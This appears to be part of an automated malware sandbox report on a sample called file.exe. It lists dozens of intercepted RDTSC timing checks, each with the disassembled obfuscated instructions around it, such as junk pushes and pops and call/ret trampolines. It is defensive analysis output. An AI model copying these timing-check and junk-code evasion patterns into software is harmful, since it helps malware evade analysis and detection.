Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67FC10 second address: 67FCA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F46B8DCA1AAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F46B8DCA198h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov ebx, dword ptr [ebp+122D336Ch] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov bx, si 0x0000003e mov eax, dword ptr [ebp+122D16CDh] 0x00000044 mov dword ptr [ebp+1245AF96h], eax 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007F46B8DCA198h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 nop 0x00000067 pushad 0x00000068 jnc 00007F46B8DCA198h 0x0000006e push edi 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67FCA1 second address: 67FCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680B76 second address: 680B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680B7D second address: 680B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680B83 second address: 680C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+1244AEE8h], edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F46B8DCA198h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 jnp 00007F46B8DCA1B6h 0x0000003f mov eax, dword ptr [ebp+122D00B9h] 0x00000045 jne 00007F46B8DCA1A4h 0x0000004b pushad 0x0000004c clc 0x0000004d mov dword ptr [ebp+1247758Ch], ecx 0x00000053 popad 0x00000054 push FFFFFFFFh 0x00000056 add bh, 00000071h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e pop eax 0x0000005f jo 00007F46B8DCA196h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 688444 second address: 68847F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F46B8B98B12h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F46B8B98B17h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6885C5 second address: 6885C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6885C9 second address: 6885D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6885D5 second address: 6885F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6885F2 second address: 6885F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6885F8 second address: 6885FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6885FC second address: 688622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F46B8B98B15h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 688622 second address: 688627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CB77 second address: 68CB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CC38 second address: 68CC3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CC3D second address: 68CC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CC4D second address: 68CC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CC52 second address: 68CC74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CD3E second address: 68CD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CD44 second address: 68CD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CD4C second address: 68CD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8DCA19Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jnl 00007F46B8DCA1A0h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F46B8DCA1A8h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CD90 second address: 68CD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 692CE4 second address: 692CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F46B8DCA19Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 692CFA second address: 692D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F46B8B98B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 692D04 second address: 692D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 692D23 second address: 692D5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007F46B8B98B08h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 jl 00007F46B8B98B06h 0x0000001a jmp 00007F46B8B98B12h 0x0000001f js 00007F46B8B98B06h 0x00000025 popad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 692EBA second address: 692EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 693014 second address: 693035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B11h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 698EAB second address: 698EB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 698EB1 second address: 698ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F46B8B98B19h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69905A second address: 69906E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F46B8DCA19Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69906E second address: 699072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6991C7 second address: 6991CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6991CD second address: 6991D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6991D5 second address: 6991DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6991DB second address: 6991DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6991DF second address: 6991FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6991FB second address: 69921F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F46B8B98B0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F46B8B98B06h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jns 00007F46B8B98B0Eh 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6994B6 second address: 6994BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6994BE second address: 6994D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F46B8B98B06h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6994D1 second address: 6994D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6994D5 second address: 6994E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F46B8B98B06h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699640 second address: 699646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699646 second address: 699663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B13h 0x00000007 je 00007F46B8B98B06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699663 second address: 69967A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA19Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F46B8DCA196h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699C08 second address: 699C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B0Dh 0x00000009 popad 0x0000000a push ebx 0x0000000b jc 00007F46B8B98B06h 0x00000011 pop ebx 0x00000012 jno 00007F46B8B98B0Ah 0x00000018 popad 0x00000019 pushad 0x0000001a jno 00007F46B8B98B08h 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699F1E second address: 699F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F46B8DCA19Bh 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F46B8DCA196h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699F36 second address: 699F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F46B8B98B06h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C42C second address: 69C432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C432 second address: 69C436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69C436 second address: 69C43C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A19BD second address: 6A19C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F46B8B98B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A19C7 second address: 6A19E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A4h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A19E5 second address: 6A19FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F46B8B98B0Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0934 second address: 6A0938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0938 second address: 6A093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A093E second address: 6A0976 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F46B8DCA1A2h 0x0000000a popad 0x0000000b pushad 0x0000000c jbe 00007F46B8DCA196h 0x00000012 jmp 00007F46B8DCA1A7h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0D6B second address: 6A0D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F46B8B98B06h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 651DCA second address: 651DE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F46B8DCA1A0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A1876 second address: 6A1880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F46B8B98B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A1880 second address: 6A1884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A013F second address: 6A0145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A91C8 second address: 6A91E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F46B8DCA1A9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AE2F8 second address: 6AE317 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F46B8B98B19h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AE317 second address: 6AE351 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F46B8DCA1CFh 0x0000000e jmp 00007F46B8DCA1A6h 0x00000013 pushad 0x00000014 jmp 00007F46B8DCA1A3h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 667E6C second address: 651355 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F46B8B98B14h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+1244D492h], edx 0x00000011 mov dword ptr [ebp+122D2238h], edi 0x00000017 lea eax, dword ptr [ebp+12479BA4h] 0x0000001d jmp 00007F46B8B98B0Eh 0x00000022 push eax 0x00000023 jmp 00007F46B8B98B0Ah 0x00000028 mov dword ptr [esp], eax 0x0000002b add dword ptr [ebp+122D371Bh], ebx 0x00000031 call dword ptr [ebp+122D223Fh] 0x00000037 jnp 00007F46B8B98B24h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F46B8B98B0Ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668392 second address: 668396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6684F2 second address: 66850E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F46B8B98B18h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668645 second address: 66864B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6686AB second address: 6686C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F46B8B98B0Dh 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6686C7 second address: 6686FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F46B8DCA198h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 jp 00007F46B8DCA196h 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668E2F second address: 668E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668E34 second address: 668E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F46B8DCA1A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668FC2 second address: 668FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 668FC6 second address: 668FCC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669181 second address: 669185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66924B second address: 6692B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F46B8DCA1A2h 0x00000011 mov cl, 79h 0x00000013 pop edi 0x00000014 lea eax, dword ptr [ebp+12479BE8h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F46B8DCA198h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 movzx edx, si 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a js 00007F46B8DCA198h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6692B2 second address: 6692B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6692B7 second address: 669341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F46B8DCA1B5h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F46B8DCA198h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 lea eax, dword ptr [ebp+12479BA4h] 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F46B8DCA198h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 mov edi, dword ptr [ebp+122D382Eh] 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 ja 00007F46B8DCA196h 0x00000059 pop ecx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669341 second address: 669347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669347 second address: 651DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F46B8DCA19Eh 0x0000000f push edx 0x00000010 jno 00007F46B8DCA196h 0x00000016 pop edx 0x00000017 nop 0x00000018 mov edx, 400A9CA7h 0x0000001d call dword ptr [ebp+122D352Bh] 0x00000023 jnp 00007F46B8DCA1CFh 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F46B8DCA19Ah 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AD5E8 second address: 6AD5EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
